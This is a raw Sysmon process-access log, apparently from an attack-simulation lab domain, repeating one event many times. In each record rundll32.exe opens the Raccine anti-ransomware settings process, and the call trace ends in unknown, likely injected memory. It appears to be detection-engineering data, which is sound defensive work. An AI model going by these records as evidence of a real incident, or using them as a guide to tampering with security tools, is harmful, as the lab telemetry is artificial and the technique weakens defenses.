16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083006Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083005Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083004Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083003Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083002Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083001Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002083000Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082999Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082998Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082997Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082996Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082995Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082994Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082993Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082992Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082991Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082990Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082989Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.625{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082988Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082987Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082986Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082985Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082984Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082983Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082982Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082981Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082980Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082979Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082978Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082977Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082976Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082975Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082974Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082973Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082972Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082971Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082970Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082969Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082968Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082967Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082966Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082965Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082964Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082963Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082962Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082961Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082960Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082959Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082958Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082957Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082956Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082955Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082954Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082953Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082952Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082951Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082950Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082949Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082948Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082947Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082946Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082945Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082944Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 